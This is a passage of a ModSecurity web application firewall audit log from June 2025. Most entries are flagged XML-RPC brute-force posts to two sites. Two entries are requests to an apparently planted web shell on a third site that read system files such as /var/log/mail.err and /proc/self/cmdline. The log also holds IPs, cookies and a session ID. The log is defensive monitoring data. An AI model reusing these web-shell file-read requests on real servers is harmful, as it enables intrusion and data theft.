hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE77nkmAj8yxyFrMChhwgQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006686457395 319130 (- - -) Stopwatch2: 1750006686457395 319130; combined=114943, p1=308, p2=1248, p3=62, p4=48, p5=56692, sr=82, sw=56585, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c86f425-Z-- --0b065023-A-- [15/Jun/2025:22:29:03.025926 +0530] aE771hLQPChAjmM6-0i6XQAAAAQ 128.199.112.101 35032 127.0.0.1 7081 --0b065023-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --0b065023-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0b065023-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE771hLQPChAjmM6-0i6XQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006742045351 980645 (- - -) Stopwatch2: 1750006742045351 980645; combined=2666, p1=383, p2=1762, p3=50, p4=134, p5=210, sr=104, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b065023-Z-- --a807a72f-A-- [15/Jun/2025:22:29:08.203978 +0530] aE7725K-05zbifgH_rQJDAAAAAU 89.134.38.81 35504 127.0.0.1 7081 --a807a72f-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 89.134.38.81 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.4395.1567 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=5e2b615d65e7244ee286e7298daf0c261750006737; _ga_PETSZCXF5J=GS2.1.s1750006745$o1$g0$t1750006745$j60$l0$h0; _ga=GA1.1.1038917214.1750006745; _fbp=fb.1.1750006746409.365095472817110825 --a807a72f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=fca885qnoju4ei7o441sin0j1d; expires=Sat, 13 Sep 2025 16:59:07 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --a807a72f-E-- --a807a72f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7725K-05zbifgH_rQJDAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7725K-05zbifgH_rQJDAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006747030605 1173491 (- - -) Stopwatch2: 1750006747030605 1173491; combined=3379, p1=410, p2=2746, p3=91, p4=28, p5=104, sr=130, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750006745" "-" Engine-Mode: "DETECTION_ONLY" --a807a72f-Z-- --ea131e01-A-- [15/Jun/2025:22:29:59.774041 +0530] aE78D4w8YNvdo5WL3neqNQAAAAc 124.109.12.110 57370 127.0.0.1 7081 --ea131e01-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ea131e01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --ea131e01-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE78D4w8YNvdo5WL3neqNQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006799530591 243521 (- - -) Stopwatch2: 1750006799530591 243521; combined=2183, p1=355, p2=1424, p3=70, p4=50, p5=177, sr=97, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea131e01-Z-- --d9fb2c46-A-- [15/Jun/2025:22:30:04.339594 +0530] aE78E2CPauOs0aEe3c08DQAAAAI 128.199.112.101 57884 127.0.0.1 7081 --d9fb2c46-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d9fb2c46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d9fb2c46-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE78E2CPauOs0aEe3c08DQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006803175979 1163672 (- - -) Stopwatch2: 1750006803175979 1163672; combined=2381, p1=412, p2=1424, p3=50, p4=85, p5=262, sr=115, sw=148, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9fb2c46-Z-- --835aef52-A-- [15/Jun/2025:22:31:02.532592 +0530] aE78Tr59833JshVCMq_dOgAAAAY 124.109.12.110 32978 127.0.0.1 7081 --835aef52-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --835aef52-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --835aef52-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE78Tr59833JshVCMq_dOgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006862242179 290503 (- - -) Stopwatch2: 1750006862242179 290503; combined=3237, p1=466, p2=2138, p3=103, p4=71, p5=278, sr=118, sw=181, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --835aef52-Z-- --30c1081a-A-- [15/Jun/2025:22:31:04.790589 +0530] aE78T940YvvHR2Fi0mNKHQAAAAk 128.199.112.101 33038 127.0.0.1 7081 --30c1081a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --30c1081a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --30c1081a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE78T940YvvHR2Fi0mNKHQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006863835370 955275 (- - -) Stopwatch2: 1750006863835370 955275; combined=2137, p1=378, p2=1397, p3=41, p4=63, p5=162, sr=98, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30c1081a-Z-- --6b8ca455-A-- [15/Jun/2025:22:31:28.719045 +0530] aE78aEmAj8yxyFrMChhxBAAAAAE 98.84.131.195 54092 127.0.0.1 7081 --6b8ca455-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.84.131.195 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6b8ca455-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --6b8ca455-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE78aEmAj8yxyFrMChhxBAAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750006888714878 4219 (- - -) Stopwatch2: 1750006888714878 4219; combined=2313, p1=357, p2=1827, p3=36, p4=36, p5=57, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b8ca455-Z-- --90c93d23-A-- [15/Jun/2025:22:32:04.177427 +0530] aE78i759833JshVCMq_dXgAAAAY 128.199.112.101 45726 127.0.0.1 7081 --90c93d23-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --90c93d23-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --90c93d23-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE78i759833JshVCMq_dXgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006923183514 993967 (- - -) Stopwatch2: 1750006923183514 993967; combined=2064, p1=333, p2=1390, p3=34, p4=54, p5=159, sr=79, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90c93d23-Z-- --00573e39-A-- [15/Jun/2025:22:32:11.669897 +0530] aE78k2CPauOs0aEe3c08VAAAAAI 52.70.123.241 45744 127.0.0.1 7081 --00573e39-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self&viewfile=//proc/self/cmdline HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.70.123.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --00573e39-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2970 Connection: close Content-Type: text/html; charset=UTF-8 --00573e39-H-- Message: Warning. Matched phrase "proc/self/cmdline" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/cmdline found within ARGS:viewfile: /proc/self/cmdline"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/cmdline" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/cmdline found within ARGS:viewfile: /proc/self/cmdline"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE78k2CPauOs0aEe3c08VAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750006931665365 4585 (- - -) Stopwatch2: 1750006931665365 4585; combined=2496, p1=369, p2=1956, p3=71, p4=40, p5=60, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00573e39-Z-- --8a135f31-A-- [15/Jun/2025:22:33:04.645004 +0530] aE78xztuDRGAAnNiXIeiZwAAAAg 128.199.112.101 55878 127.0.0.1 7081 --8a135f31-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8a135f31-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8a135f31-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE78xztuDRGAAnNiXIeiZwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006983705596 939461 (- - -) Stopwatch2: 1750006983705596 939461; combined=2382, p1=389, p2=1644, p3=38, p4=55, p5=165, sr=110, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8a135f31-Z-- --e45bae51-A-- [15/Jun/2025:22:33:04.909773 +0530] aE78yL59833JshVCMq_deQAAAAY 124.109.12.110 55908 127.0.0.1 7081 --e45bae51-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e45bae51-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --e45bae51-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE78yL59833JshVCMq_deQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750006984667797 242038 (- - -) Stopwatch2: 1750006984667797 242038; combined=2466, p1=347, p2=1712, p3=76, p4=51, p5=175, sr=99, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e45bae51-Z-- --0b3f3a4f-A-- [15/Jun/2025:22:34:04.787245 +0530] aE79AxLQPChAjmM6-0i7BAAAAAQ 128.199.112.101 36576 127.0.0.1 7081 --0b3f3a4f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --0b3f3a4f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0b3f3a4f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE79AxLQPChAjmM6-0i7BAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007043768281 1019021 (- - -) Stopwatch2: 1750007043768281 1019021; combined=2441, p1=373, p2=1667, p3=42, p4=65, p5=184, sr=102, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b3f3a4f-Z-- --fd42b815-A-- [15/Jun/2025:22:34:58.856881 +0530] aE79OkmAj8yxyFrMChhxbQAAAAE 124.109.12.110 58968 127.0.0.1 7081 --fd42b815-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: 